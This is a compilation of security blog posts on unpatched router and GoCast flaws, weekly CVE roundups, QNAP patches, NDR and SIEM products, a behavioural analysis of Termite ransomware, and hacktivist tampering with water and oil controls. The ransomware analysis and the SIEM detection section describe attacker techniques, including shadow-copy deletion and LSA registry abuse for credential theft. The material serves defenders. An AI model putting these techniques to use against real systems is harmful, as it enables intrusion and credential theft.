MC LR Router and GoCast unpatched vulnerabilities

MC LR Router and GoCast unpatched vulnerabilities

Cisco Talos’ Vulnerability Research team recently discovered two vulnerabilities in MC Technologies LR Router and three vulnerabilities in the GoCast service. 

These vulnerabilities have not been patched at time of this posting. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

MC Technologies OS command injection vulnerabilities 

Discovered by Matt Wiseman of Cisco Talos. 

The MC-LR Router from MC Technologies supports IPsec and OpenVPN implementations, firewall capabilities, remote management via HTTP and SNMP, and configurable alerting via SMS and email, with two-port and four-port variants, includes models that support transparent serial-to-TCP translations and 1-in/1-out digital I/O. 

Talos recently published two advisories detailing OS command injection vulnerabilities discovered in the MC-LR Router from MC Technologies. TALOS-2024-1953 covers three vulnerabilities (CVE-2024-28025 through CVE-2024-28027), which are reachable through the I/O configuration functionality of the web interface. TALOS-2024-1954 covers one vulnerability (CVE-2024-21786) in the importation of uploaded configuration files. All vulnerabilities may be triggered with an authenticated HTTP request. 

GoCast authentication and OS command injection vulnerabilities 

Discovered by Edwin Molenaar and Matt Street of Cisco Meraki. 

The GoCast tool provides BGP routing for advertisements from a host; it is commonly used for anycast-based load balancing for infrastructure service instances available in geographically diverse regions.  

The GoCast HTTP API allows the registration and deregistration of apps without requiring authentication, shown in TALOS-2024-1962 (CVE-2024-21855). The lack of authentication can be used to exploit TALOS-2024-1960 (CVE-2024-28892) and TALOS-2024-1961 (CVE-2024-29224), leading to OS command injection and arbitrary command execution. 

Cisco Talos Blog – ​Read More

Cyble’s Weekly Vulnerability Report: Critical Flaws in Major Software Including Progress Software, QNAP, and 7-Zip

Weekly Vulnerability

Overview

The Cyble Research & Intelligence Labs (CRIL) has released its Weekly Vulnerability Insights Report, highlighting a series of critical vulnerabilities reported between November 27, 2024, and December 3, 2024.

This week’s findings focus on various vulnerabilities that pose risks to organizations, ranging from open-source applications to widely used enterprise software. The analysis includes vulnerabilities that have been actively exploited or are likely to be exploited in the near future, with some already accompanied by proof-of-concept (PoC) exploit code.

One of the most noteworthy vulnerabilities identified in this week’s report is CVE-2024-11680, which impacts ProjectSend, an open-source file-sharing application. This vulnerability is categorized as a critical vulnerability in CISA’s Known Exploited Vulnerabilities (KEV) catalog. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-11680 along with two other vulnerabilities to its catalog.

Throughout this week, CRIL has extensively analyzed vulnerabilities in products from major vendors like Progress Software, Veeam, Microsoft, and QNAP, as well as open-source software like 7-Zip.

CISA’s KEV Catalog: Active Exploitation and Critical Vulnerabilities

As part of its efforts to inform the public about vulnerabilities that are actively exploited, CISA has added three vulnerabilities to its Known Exploited Vulnerabilities Catalog between November 27 and December 3, 2024.

Among these is CVE-2024-11680, a critical flaw in ProjectSend that involves improper authentication, allowing attackers to bypass security and potentially gain unauthorized access. This vulnerability has been assigned a CVSSv3 score of 9.8, making it a high-priority issue for organizations using the software.

Additionally, CVE-2024-11667, a path traversal vulnerability in Zyxel firewalls, also made it to the KEV catalog. Although not as critical as CVE-2024-11680, this vulnerability is still high-risk, affecting multiple models of Zyxel Firewalls with a CVSSv3 score of 7.5. This issue could allow attackers to access sensitive files on vulnerable systems.

Furthermore, CVE-2023-45727, an XML External Entity (XXE) vulnerability in North Grid’s Proself software, was included as well. Exploitation of this vulnerability can allow attackers to launch XXE attacks remotely, exposing systems to potential data breaches.

Major Vulnerabilities Identified

Several other vulnerabilities have been identified as critical threats in this week’s report. Among them:

  1. CVE-2024-8785 – A Remote Code Execution (RCE) vulnerability in WhatsUp Gold, a network monitoring software by Progress Software Corporation. This vulnerability allows unauthenticated remote attackers to exploit the NmAPI.exe service to manipulate the Windows registry, potentially resulting in system compromise. With the availability of PoC exploit code, the risk of this vulnerability being weaponized is particularly high.
  2. CVE-2024-42448 and CVE-2024-42449 – Both vulnerabilities affect the Veeam Service Provider Console (VSPC), a cloud-based platform used for managing and monitoring data protection services. These vulnerabilities could allow for Remote Code Execution (RCE) and the exposure of sensitive information like NTLM hashes. Veeam has released patches, but organizations are urged to patch their systems immediately to prevent exploitation.
  3. CVE-2024-11477 – An RCE vulnerability in the popular file archiver 7-Zip. This flaw arises from Zstandard Decompression in versions prior to 24.07 and could be exploited in email-based phishing campaigns that use malicious compressed files as delivery mechanisms. Given the high use of 7-Zip in both personal and organizational settings, this vulnerability is a major concern.
  4. CVE-2024-49019 – A high-severity elevation of privilege vulnerability in Microsoft’s Active Directory Certificate Services. This flaw allows attackers to gain elevated permissions by exploiting misconfigurations in certificate templates. CVE-2024-49019 affects millions of Windows-based systems, and with exploit codes already circulating, it poses a significant risk.
  5. CVE-2024-38077 – A critical vulnerability affecting the Windows Remote Desktop Licensing Service, which allows Remote Code Execution (RCE). This vulnerability is particularly dangerous as it impacts multiple versions of Windows, making it a prime target for attackers.

Online Threats on Underground Forums

One of the more concerning findings in the Weekly Vulnerability Report is the presence of active discussions and exploit sharing on underground forums and Telegram channels. These forums are often frequented by cybercriminals who share PoC exploit codes for various vulnerabilities. This week, researchers from CRIL tracked several discussions related to the following vulnerabilities:

  • CVE-2024-44285 – A use-after-free vulnerability found in Apple’s operating systems, including iOS, iPadOS, and watchOS. Exploiting this flaw could lead to unexpected termination of the system or even kernel memory corruption.
  • CVE-2024-11320 – An arbitrary code execution (RCE) vulnerability affecting Pandora FMS. This vulnerability can be exploited via the LDAP authentication mechanism, potentially giving attackers full access to vulnerable systems.
  • CVE-2024-44308 – A critical vulnerability in JavaScriptCore, part of the WebKit engine used by Apple’s Safari browser. This flaw could lead to RCE when users visit malicious websites.
  • CVE-2024-0012 – An authentication bypass vulnerability in Palo Alto Networks’ PAN-OS, affecting several versions of the software. This flaw allows attackers to bypass authentication and gain administrative privileges, providing them with full control over affected devices.

Recommendations and Mitigations

Following these vulnerabilities, CRIL offers several key recommendations to help organizations mitigate potential security risks:

  1. Organizations should ensure they are applying the latest patches released by vendors to address vulnerabilities like CVE-2024-11680 and others identified in this report. Patching critical vulnerabilities immediately can prevent attacks from exploiting these weaknesses.
  2. A comprehensive patch management process is essential. This includes testing, deployment, and verification of patches to ensure that systems remain secure.
  3. Critical systems should be isolated from less secure areas of the network to reduce exposure to potential attacks. Using firewalls and access control measures can help limit the impact of a breach.
  4. Organizations should implement monitoring systems such as SIEM (Security Information and Event Management) to detect suspicious activities across their networks.
  5. Regular training on security best practices, particularly for dealing with phishing emails and malicious attachments, can help reduce the risk of exploitation through social engineering.

Conclusion

The Weekly Vulnerability Report from Cyble Research & Intelligence Labs provides essential insights into the vulnerabilities impacting critical systems and software. With high-risk vulnerabilities such as CVE-2024-11680, CVE-2024-8785, and CVE-2024-49019 in play, it is crucial for organizations to stay proactive in applying patches, monitoring for potential attacks, and reinforcing their overall security posture.

With PoC exploit code already circulating for many of these vulnerabilities, the window of opportunity for attackers to exploit these flaws is rapidly closing, making immediate action imperative. By following the best practices and recommendations provided in this report, organizations can better protect themselves.

The post Cyble’s Weekly Vulnerability Report: Critical Flaws in Major Software Including Progress Software, QNAP, and 7-Zip appeared first on Cyble.

Blog – Cyble – ​Read More

Comprehensive overview of network detection & response capabilities and uses | Kaspersky official blog

Why do even large companies that have invested heavily in their cyberdefense still fall victim to cyberattacks? Most often, it’s a matter of an outdated approach to security. Security teams may deploy dozens of tools, but lack visibility within their own networks, which nowadays include not only usual physical segments, but cloud environments as well. Hackers often exploit stolen credentials, operate through compromised contractors, and try to use malware as rarely as possible — preferring to exploit legitimate software and dual-purpose applications. That’s why security tools that are usually used to protect company’s endpoints may not be effective enough against well-disguised cyberattacks.

In a recent survey, 44% of CISOs reported missing a data breach, with 84% attributing the issue to an inability to analyze traffic, particularly encrypted traffic. This is where network detection and response (NDR) systems come into play. They offer comprehensive traffic analysis, including internal traffic — significantly enhancing security capabilities. In the Kaspersky product range, NDR functionality is implemented as part of its Kaspersky Anti Targeted Attack Platform (KATA).

Outdated security tools aren’t enough

If there was one word to describe the priorities of today’s attackers, it would be “stealth”. Whether it’s espionage-focused APTs, ransomware groups, or any other attacks targeting a specific organization, adversaries go to great lengths to avoid detection, and complicate post-incident analysis. Our incident response report illustrates this vividly. Attackers exploit legitimate employee or contractor credentials, leverage admin tools already in use within the system (a tactic known as “living off the land”), and exploit vulnerabilities to perform actions from privileged user accounts, processes, or devices. Moreover, edge devices, such as proxy servers and firewalls, are increasingly being used as attack footholds.

How do cybersecurity teams respond to this? If a company’s threat detection approach was designed several years ago, its defenders might simply lack the tools to detect such activity in a timely manner:

  • In their traditional form, they only protect the organization’s perimeter, and don’t assist in detecting suspicious network activity inside it (such as attackers taking over additional computers).
  • Intrusion detection and prevention systems (IDS/IPS). The capabilities of classic IDS’s for detecting activity over encrypted channels are very limited, and their typical location between network segments impedes detection of lateral movement.
  • Antivirus and endpoint protection systems. These tools are difficult to use for detecting activity conducted entirely with legitimate tools in manual mode. Moreover, organizations always have routers, IoT devices, or network peripherals where it’s not possible to deploy such protection systems.

What is network detection and response?

NDR systems provide detailed monitoring of an organization’s traffic and apply various rules and algorithms to detect anomalous activity. They also include tools for rapid incident response.

The key difference to firewalls is the monitoring of all types of traffic flowing in various directions. Thus, not only communications between a network and the internet (north-south) are being analyzed, but data exchange between hosts within a corporate network (east-west) as well. Communications between systems in external networks and corporate cloud resources, as well as between cloud resources themselves, are not left unattended either. This makes NDR effective in various infrastructures: on-premises, cloud, and hybrid.

The key difference to classic IDS/IPS is the use of behavioral analysis mechanisms alongside signature analysis.

Besides connections analysis, an NDR solution keeps traffic in its “raw” form, and provides a whole range of technologies for analysis of such “snapshots” of data exchange; NDR can analyze many parameters of traffic (including metadata), going beyond simple “address-host-protocol” dependencies. For example, using JAx fingerprints, NDR can identify the nature even of encrypted SSL/TLS connections, and detect malicious traffic without needing to decrypt it.

Benefits of NDR for IT and security teams

Early threat detection. Even the initial steps of attackers — whether it’s brute-forcing passwords or exploiting vulnerabilities in publicly accessible applications — leave traces that NDR tools can detect. NDR, having “presence” not only on the edges of a network, but at its endpoints as well, is also well-suited to detecting lateral movement within the network, manipulation with authentication tokens, tunneling, reverse shells, and other common attack techniques, including network interactions.

Accelerated incident investigation. NDR tools allow for both broad and deep analysis of suspicious activity. Network interaction diagrams show where attackers moved and where their activity originated from, while access to raw traffic allows for the reconstruction of the attacker’s actions and the creation of detection rules for future searches.

A systematic approach to the big picture of an attack. NDR works with the tactics, techniques, and procedures of the attack — systematized according to such a popular framework as MITRE ATT&CK. Solutions of this class usually allow a security team to easily classify the detected indicators and, as a result, better understand the big picture of the attack, figure out the stage it’s at, and how the attack can be stopped as effectively as possible.

Detection of internal threats, misconfigurations, and shadow IT. The “behavioral” approach to traffic allows NDR to address preventive tasks as well. Various security policy violations, such as using unauthorized applications on personal devices, connecting additional devices to the company infrastructure, sharing passwords, accessing information not required for work tasks, using outdated software versions, and running server software without properly configured encryption and authentication, can be identified early and stopped.

Supply chain threat detection. Monitoring the traffic of legitimate applications may reveal undeclared functionality, such as unauthorized telemetry transmission to the manufacturer or attempts to deliver trojanized updates.

Automated response. The “R” in NDR stands for response actions such as isolating hosts with suspicious activity, tightening network zone interaction policies, and blocking high-risk protocols or malicious external hosts. Depending on the circumstances, the response can be either manual or automatic, triggered by the “if-then” presets.

NDR, EDR, XDR, and NTA

IT management and executives often ask tricky questions about how various *DR solutions differ from each other and why they’re all needed at the same time.

NTA (network traffic analysis) systems are the foundation from which NDR evolved. They were designed to collect and analyze all the traffic of a company (hence the name). However, practical implementation revealed the broader potential of this technology — that is, it could be used for rapid incident response. Response capabilities, including automation, are NDR’s primary distinction.

EDR (Endpoint Detection & Response) systems analyze cyberthreats on specific devices within the network (endpoints). While NDR provides a deep analysis of devices’ interactions and communication within the organization, EDR offers an equally detailed picture of the activity on individual devices. These systems complement each other, and only together do they provide a complete view of what’s happening in the organization and the tools needed for detection and response.

XDR (eXtended Detection & Response) systems take a holistic approach to threat detection and response by aggregating and correlating data from various sources, including endpoints, physical and cloud infrastructures, network devices, and more. This enables defenders to see a comprehensive overview of network activity, combine events from different sources into single alerts, apply advanced analytics to them, and simplify response actions. Different vendors put different spins on XDR: some offer XDR as a product that includes both EDR and NDR functionalities, while for others it may only support integration with these external tools.

Kaspersky’s approach: integrating NDR into the security ecosystem

Implementing NDR implies that an organization has already achieved a high level of cybersecurity maturity, with established monitoring and response practices, as well as tools for information exchange between systems, ensuring correlation and enrichment of data from various sources. This is why in Kaspersky’s product range and the NDR module enhances the capabilities of the Kaspersky Anti Targeted Attack Platform (KATA). The basic version of KATA includes mechanisms such as SSL/TLS connection fingerprint analysis, north-south traffic attack detection, selective traffic capture for suspicious connections, and basic response functions.

The KATA NDR Enhanced version includes all the NDR capabilities described above, including deep analysis and full storage of traffic, intra-network connection monitoring, and automated advanced response functions.

The top-tier version, KATA Ultra, combines expert EDR capabilities with full NDR functions, offering a comprehensive, single-vendor XDR solution.

Kaspersky official blog – ​Read More

QNAP NAS Vulnerabilities Exposed: What You Need to Know to Stay Secure

QNAP

Overview

QNAP NAS systems, a trusted choice for personal and enterprise data storage, have recently been flagged for multiple critical vulnerabilities.

Multiple vulnerabilities have been identified in QNAP’s operating systems, leaving users exposed to a variety of potential threats, including remote code execution, denial of service (DoS), data manipulation, sensitive information disclosure, and security restriction bypass. If exploited, these vulnerabilities could compromise not just the integrity of the systems but also the valuable data they house.

With businesses and individuals relying heavily on QNAP NAS for secure storage, these vulnerabilities highlight the growing need for strong security measures and proactive updates. This blog dives deep into the technical aspects of the vulnerabilities, their impact, and how users can protect their systems.

Impact of the Vulnerabilities

The reported vulnerabilities pose significant threats to the security and stability of QNAP NAS systems. Here’s a breakdown of the potential impacts:

Impact Description
Remote Code Execution Allows attackers to execute arbitrary code on the system remotely.
Denial of Service (DoS) Overloads the system, making it inaccessible to legitimate users.
Information Disclosure Exposes sensitive information stored in the NAS to unauthorized users.
Data Manipulation Enables attackers to alter, delete, or corrupt critical data.
Security Restriction Bypass Allows attackers to circumvent security controls, leading to unauthorized access.

Systems and Technologies Affected

The vulnerabilities affect specific versions of QNAP’s operating systems, including QTS and QuTS hero. Below is the list of impacted systems:

Operating System Affected Versions
QTS 5.1.x, 5.2.x
QuTS hero h5.1.x, h5.2.x

Details of the Vulnerabilities

These vulnerabilities, identified by their Common Vulnerabilities and Exposures (CVE) identifiers, target various system components. A closer look at each vulnerability:

CVE ID Vulnerability Type Description
CVE-2024-48859 Improper Authentication Could allow remote attackers to compromise the system’s security.
CVE-2024-48865 Improper Certificate Validation Enables attackers with local network access to compromise security.
CVE-2024-48866 Improper URL Encoding Handling Causes the system to enter an unexpected state.
CVE-2024-48867, 48868 CRLF Injection Permits attackers to modify application data.
CVE-2024-50393 Command Injection Allows remote attackers to execute arbitrary commands on the system.
CVE-2024-50402, 50403 Externally-Controlled Format String Enables attackers with administrator privileges to access secret data or modify system memory.

These vulnerabilities highlight a range of attack vectors, from improper input validation to poorly managed authentication mechanisms.

Mitigation and Fixes

QNAP has released patches addressing these vulnerabilities in updated versions of its operating systems. Users are strongly encouraged to update to the fixed versions as shown below:

Affected Product Fixed Version Release Date
QTS 5.1.x QTS 5.1.9.2954 build 20241120 and later November 20, 2024
QTS 5.2.x QTS 5.2.2.2950 build 20241114 and later November 14, 2024
QuTS hero h5.1.x QuTS hero h5.1.9.2954 build 20241120 and later November 20, 2024
QuTS hero h5.2.x QuTS hero h5.2.2.2952 build 20241116 and later November 16, 2024

How to Update

To ensure your QNAP NAS system is secure, follow these steps to update your firmware:

  1. Login: Access QTS or QuTS hero as an administrator.
  2. Navigate to Firmware Update:
    • Go to Control Panel > System > Firmware Update.

  3. Check for Updates:
    • Under the Live Update tab, click Check for Update.
    • The system will automatically download and install the latest update.

  4. Manual Update (Optional):
    • Visit the QNAP Download Center.
    • Download the latest firmware and install it manually.

Why These Vulnerabilities Matter

QNAP NAS devices are widely used in personal and enterprise environments. Sensitive data such as backups, financial records, and confidential information are often stored on these systems, and a breach can lead to catastrophic consequences, including financial losses and reputational damage.

Key Lessons for Users

  1. Regular Updates: Always ensure your NAS firmware is up-to-date to protect against the latest threats.
  2. Vulnerability Awareness: Familiarize yourself with vulnerabilities affecting your devices to act proactively.
  3. Network Security: To complement device security, implement additional network-level defenses, such as firewalls and intrusion detection systems.

Best Practices for Securing QNAP NAS

  • Enable 2-Factor Authentication: Adds an extra layer of security by requiring a secondary verification method.
  • Limit External Access: Restrict remote access to the NAS device to only trusted IP addresses.
  • Regular Backups: Ensure all critical data is backed up in a secure and separate location.
  • Monitor for Anomalies: Use QNAP’s built-in monitoring tools to detect unusual activities.
  • Use Strong Passwords: Replace default credentials with complex and unique passwords to prevent unauthorized access.

Conclusion

The discovery of these vulnerabilities points out the importance of maintaining strong cybersecurity practices for critical systems like QNAP NAS. With the provided fixes and recommendations, users can safeguard their systems against potential exploitation.

Stay vigilant, update promptly, and prioritize security to ensure the integrity of your data and systems.

Source:

https://www.hkcert.org/security-bulletin/qnap-nas-multiple-vulnerabilities_20241209

https://www.qnap.com/en/security-advisory/qsa-24-49

The post QNAP NAS Vulnerabilities Exposed: What You Need to Know to Stay Secure appeared first on Cyble.

Blog – Cyble – ​Read More

A Technical Look at the New ‘Termite’ Ransomware that Hit Blue Yonder

Termite ransomware Blue Yonder

The ransomware attack that hit supply chain management platform Blue Yonder and its customers last month was the work of a new ransomware group called “Termite.”

Cyble Research and Intelligence Labs (CRIL) researchers have examined a Termite ransomware binary and determined that Termite is essentially a rebranding of the notorious Babuk ransomware. The Termite leak site claims seven victims so far (geographic distribution below).

We’ll cover the technical details of the new Termite ransomware strain, which was first identified by PCrisk, along with MITRE ATT&CK techniques, indicators of compromise (IoCs) and recommendations.

Technical Details of Termite Ransomware

Upon execution, the ransomware invokes the SetProcessShutdownParameters(0, 0) API to ensure that its process is one of the last to be terminated during system shutdown. This tactic is used to maximize the time available for the ransomware to complete its encryption process.

The ransomware then attempts to terminate services on the victim’s machine to prevent interruptions during the encryption process. It uses the OpenSCManagerA() API to establish a connection with the Service Control Manager, granting access to the service control manager database (image below).

Enumerating services

After gaining access, the ransomware enumerates the services on the victim’s machine to retrieve their names. It specifically looks for services such as veeam, vmms, memtas and others, and terminating them if they are found to be actively running.

The ransomware enumerates running processes using the CreateToolhelp32Snapshot(), Process32FirstW(), and Process32NextW() APIs. It checks process names such as sql.exe, oracle.exe, firefox.exe and others and terminates them if they are actively running.

Process termination

After that, the ransomware launches the vssadmin.exe process to delete all Shadow Copies, as shown in the below figure. This action is performed to prevent system recovery after the files have been encrypted.

Deleting shadow copies

The ransomware also uses the SHEmptyRecycleBinA() API to delete all items from the Recycle Bin, ensuring that no deleted files can be restored after encryption. After execution, Termite Ransomware attempts to retrieve system information using the GetSystemInfo() API, which collects details like the number of processors, as shown in the below figure.

Retrieving system information

The ransomware then creates a separate thread for each detected CPU, generates ransom notes named “How To Restore Your Files.txt”, and encrypts files on the victim’s machine.

It avoids encrypting certain system folders such as AppData, Boot, Windows, Windows.old etc. Additionally, it specifically excludes system files such as autorun.inf, boot.ini, bootfont.bin etc., as well as file extensions like .exe, .dll, and .termite from the encryption process to ensure that essential system functions remain intact.

Similar to Babuk ransomware, Termite appends the signature “choung dong looks like hot dog” at the end of the encrypted file.

Encryption marker

The figure below shows the ransom note dropped by the ransomware, titled ” How To Restore Your Files.txt,” which instructs victims to visit the onion site for additional information.

Ransom note

After dropping the ransom notes, the malware encrypts the files on the victim’s machine and appends the “.termite” extension, as shown in the figure below.

Encrypted files

The Termite ransomware can also spread through network shares and paths of the infected machine, as shown below.

Spreading through network shares and paths

If the command-line argument is “shares,” the ransomware uses the NetShareEnum() API to locate network shares and retrieve information about each shared resource on the server. It then checks for the $ADMIN share and begins encrypting the files. If the command-line argument is “paths,” the ransomware calls the GetDriveTypeW() API to identify network drives connected to the infected machine, and once located, it starts encrypting the files. If neither “-paths” nor “-shares” are provided, and the mutex named “DoYouWantToHaveSexWithCuongDong” is not found on the infected machine, the ransomware recursively traverses all local drives and encrypts the files.

Conclusion

Termite ransomware represents a new and growing threat in the cyber landscape, leveraging advanced tactics such as double extortion to maximize its impact on victims. By targeting businesses and demanding substantial ransoms, it not only disrupts operations but also exposes organizations to significant financial, legal, and reputational risks. The emergence of Termite underscores the critical need for robust cybersecurity measures, proactive threat intelligence, and incident response strategies to counter the evolving tactics of ransomware groups.

Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices below:

Safety Measures to Prevent Ransomware Attacks

  • Do not open untrusted links and email attachments without first verifying their authenticity.
  • Conduct regular backup practices and keep those backups offline or in a separate network.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
  • Use a reputable antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile. 

MITRE ATT&CK® Techniques

Tactic Technique Procedure
Execution  T1204.002 (User Execution)  User executes the ransomware file
Defense Evasion  T1070.004 (Indicator Removal: File Deletion)  Ransomware deletes itself after execution
Discovery  T1083 (File and Directory Discovery)  Ransomware enumerates folders for file encryption and file deletion. 
Discovery  T1135 (Network Share Discovery)  Targets Network Shares and Paths
Impact  T1486 (Data Encrypted for Impact)  Ransomware encrypts the data for extortion. 
Impact  T1490 (Inhibit System Recovery) Disable automatic Windows recovery 

IOC

Indicators Indicator Type Description
f0ec54b9dc2e64c214e92b521933cee172283ff5c942cf84fae4ec5b03abab55 SHA-256 Termite Ransomware

The post A Technical Look at the New ‘Termite’ Ransomware that Hit Blue Yonder appeared first on Cyble.

Blog – Cyble – ​Read More

Kaspersky SIEM improvements in Q4 2024 | Kaspersky official blog

In attacks on infrastructure of various companies, cybercriminals are increasingly resorting to manipulating modules that interact with the Local Security Authority (LSA) process. This enables them to steal user credentials, establish persistence in the system, elevate privileges, or extend the attack to other systems within the target company. Therefore, for the latest quarterly update of our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, we’ve added rules designed to detect such attempts. In terms of the MITRE ATT&CK classification, the new rules can detect techniques T1547.002, T1547.005 and T1556.002.

What are techniques T1547.002, T1547.005 and T1556.002?

Both variants of technique T1547 mentioned above involve using the LSA process to load malicious modules. Sub-technique 002 describes adding malicious dynamic-link libraries (DLLs) with Windows authentication packages, while sub-technique 005 involves DLLs with security support provider (SSP) packages. Loading these modules allows attackers to access the LSA process memory, which can contain critical data such as user credentials.

Technique T1556.002 describes a scenario where an attacker registers a malicious password filter DLL in the system. These filters are essentially mechanisms for enforcing password policies. When a legitimate user changes a password or sets a new one, the LSA process compares it against all registered filters, and is forced to handle the passwords in plain text form, i.e., unencrypted. If an attacker manages to introduce a malicious password filter into the system, they can collect passwords with every request.

All three techniques involve placing malicious libraries in the C:Windowssystem32 directory and registering them in the system registry under the following keys of the SYSTEMCurrentControlSetControlLSA branch: Authentication Packages for T1547.002, Security Packages for T1547.005, and Notification Packages for T1556.002.

How our SIEM counters techniques T1547.002, T1547.005 and T1556.002

To counter these techniques, the Kaspersky Unified Monitoring and Analysis Platform will be updated with rules R154_02–R154_10, which detect, among other things, the following events:

  • Loading of suspicious authentication packages, password filter packages, and security support provider modules using events 4610, 4614 and 4622, respectively.
  • Commands executed in cmd.exe and powershell.exe and aimed at modifying the LSA registry branch and the Authentication Packages, Notification Packages and Security Packages keys.
  • Changes (detected through registry modification event 4657) of the LSA registry branch that could enable a malicious file.

Other improvements in the Kaspersky Unified Monitoring and Analysis Platform update

In this update, we’re also introducing rule R999_99, which detects changes in Active Directory accounts’ critical attributes, such as scriptPath and msTSInitialProgram, which enable various actions to be performed upon login.

These attributes set some scripts to execute every time a user logs into the system. This makes them an attractive target for attackers aiming to establish persistence in the network. Tampering with these attributes may indicate unauthorized attempts to gain a foothold in the system or escalate privileges — technique T1037.003 under the MITRE ATT&CK classification.

The strategy for detecting these manipulations is to monitor Windows event logs — particularly event 5136. This event records any changes made to objects in Active Directory, including attribute modifications.

After the latest update, our SIEM platform will provide over 700 rules. Thus, by the end of 2024, our solution will cover 400 MITRE ATT&CK techniques. Of course, we’re not aiming to create rules to detect every technique described in the matrix. A significant portion of them cannot be fully addressed due to their nature — for example, ones involving actions performed outside the protected perimeter or the techniques not fully covered by SIEM solutions by definition. However, in the fourth quarter of this year, we’ve focused on further expanding the coverage of MITRE ATT&CK techniques while enhancing the detection logic for already covered techniques.

New and improved normalizers

In the latest update, we’ve also added normalizers to our SIEM system that support the following event sources:

  • [OOTB] McAfee Endpoint DLP syslog
  • [OOTB] LastLine Enterprise syslog cef
  • [OOTB] MongoDb syslog
  • [OOTB] GajShield Firewall syslog
  • [OOTB] Eltex ESR syslog
  • [OOTB] Linux auditd syslog for KUMA 3.2
  • [OOTB] Barracuda Cloud Email Security Gateway syslog
  • [OOTB] Yandex Cloud
  • [OOTB] InfoWatch Person Monitor SQL
  • [OOTB] Kaspersky Industrial CyberSecurity for Networks 4.2 syslog

In addition, our experts have improved the following normalizers:

  • [OOTB] Microsoft Products via KES WIN
  • [OOTB] Microsoft Products for KUMA 3
  • [OOTB] KSC from SQL
  • [OOTB] Ideco UTM syslog
  • [OOTB] KEDR telemetry
  • [OOTB] Vipnet TIAS syslog
  • [OOTB] PostgreSQL pgAudit syslog
  • [OOTB] KSC PostgreSQL
  • [OOTB] Linux auditd syslog for KUMA 3.2

The full list of supported event sources in Kaspersky Unified Monitoring and Analysis Platform 3.4 can be found in the Online Help, where you can also find information on correlation rules. In our blog you can also read about the updates for our SIEM platform for the first, second and third quarters of 2024.

To learn more about our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, please visit the official product page.

Kaspersky official blog – ​Read More

Russian Hacktivists Increasingly Tamper with Energy and Water System Controls

Russian Hacktivists

Overview 

Two Russian hacktivist groups are increasingly targeting critical infrastructure in the U.S. and elsewhere, and their attacks go well beyond the DDoS attacks and website defacements that hacktivist groups typically engage in. 

The groups – the People’s Cyber Army and Z-Pentest – have posted videos to their Telegram channels allegedly showing members tampering with operational technology controls (OT), most notably in the oil and gas and water system sectors. 

Those claims, documented by Cyble dark web researchers, may largely be intended to establish credibility rather than inflict damage on targets, but within the last week Z-Pentest’s claims have escalated to include disrupting one U.S. oil well system. 

The groups have also accessed operational controls for critical infrastructure in other countries, notably Canada, Australia, France, South Korea, Taiwan, Italy, Romania, Germany and Poland, often claiming retaliation for a country’s support for Ukraine in its war with Russia. 

Some of the attacks have been publicly reported – most notably the People’s Cyber Army attacks on water facilities – but Z-Pentest’s claims of energy sector attacks have largely flown under the radar. 

It is not clear how much damage the Russian groups could do or are capable of, but given repeated warnings from U.S. cybersecurity and intelligence agencies about China’s deep penetration of U.S. critical infrastructure, these environments should be considered deeply vulnerable and strengthened accordingly. 

Z-Pentest’s Activities 

Z-Pentest appears to have been active only since October, but in those two months Cyble’s dark web research team has recorded 10 claims of attacks by the group, all involving accessing control panels in critical infrastructure environments. Their main Telegram channel was recently shut down but the group maintains a presence on X and claims to be based in Serbia. 

Z-Pentest’s most recent claim involved disrupting critical systems at an oil well site, including systems responsible for water pumping, petroleum gas flaring, and oil collection. A 6-minute screen recording shows detailed screenshots of the facility’s control systems, showing tank setpoints, vapor recovery metrics, and operational dashboards, allegedly accessed and changed during the breach. It is not clear where that oil facility is located, but the other two U.S. oil facility claims appear to correspond with known locations and companies. 

In one of the other two claimed attacks, the threat group released a 4-minute screen recording where they accessed a range of operational controls (identifying information removed from example below). 

While the hackers may well be accessing sensitive environments, it is not clear how much damage they could do. Programmable logic controllers (PLCs), for example, often include safety features that can prevent damaging actions from occurring, but the fact that such environments are accessible to threat actors is nonetheless concerning. 

Cyble has in general observed increased threat activity targeting the energy sector in recent months. Dark web claims and ransomware attacks have increased, and network access and zero-day vulnerabilities have been offered for sale on dark web market places. Cyble has observed instances where credentials for energy network access were offered for sale on the dark web before larger breaches and attacks occurred, suggesting that monitoring for credential leaks may be an important defense for preventing larger breaches later. 

People’s Cyber Army Activities 

The better-known People’s Cyber Army (PCA) – also known as the Cyber Army of Russia Reborn – has also been targeting critical infrastructure controls in the U.S. and elsewhere, and there have been some suggestions that PCA and Z-Pentest may be working together. While many of the group’s activities have involved DDoS attacks, recent claims have included access to the control panels of a U.S. environmental cleanup company and water systems in Texas and Delaware. 

Water and wastewater systems are considered particularly vulnerable by some OT security specialists, in part because communities are ill-equipped to deal without them for any length of time. 

The People’s Cyber Army struck twice in late August and September, releasing screen recordings showing the group tampering with system settings on control panels at the Stanton Water Treatment Plant in Stanton, Texas, and New Castle, Delaware water towers (images below). 

Image above: Stanton Water Treatment Plant attack 

Image above: Delaware water tower attack 

In the Texas case, the hackers were able to open valves and release untreated water, but otherwise no damage is believed to have occurred. 

In all, Cyble has documented eight water system attacks by the People’s Cyber Army this year in the U.S. and elsewhere, including a January attack that caused water storage tanks to overflow in Abernathy and Muleshoe, Texas. The group has been targeting Ukraine allies since 2022, and was sanctioned by the U.S. government in July 2024. 

Conclusion 

Security weaknesses in critical infrastructure organizations are by now a well-documented phenomenon, but the recent spate of attacks targeting energy and water facilities suggests a concerning escalation in the exploitation of these vulnerable environments. The emergence of Z-Pentest as a new threat actor in this space should be taken seriously, as the group has demonstrated an apparent ability to penetrate these environments and access – and tinker with – operational control panels. 

Critical infrastructure environments often cannot afford downtime, and end-of-life devices often remain in service long after support has ended. With those challenges in mind, below are some general recommendations for improving the security of critical environments: 

  1. Organizations should follow ICS/OT vulnerability announcements and apply patches as soon as they become available. Staying up to date with vendor updates and security advisories is critical to ensuring that vulnerabilities are addressed promptly. 

  1. Segregating ICS/OT/SCADA networks from other parts of the IT infrastructure can help prevent lateral movement in case of a breach. Implementing a Zero-Trust Architecture is also advisable to limit the potential for exploitation. Devices that do not need to be exposed to the internet should not be, and those that require web exposure should be protected to the extent possible. 

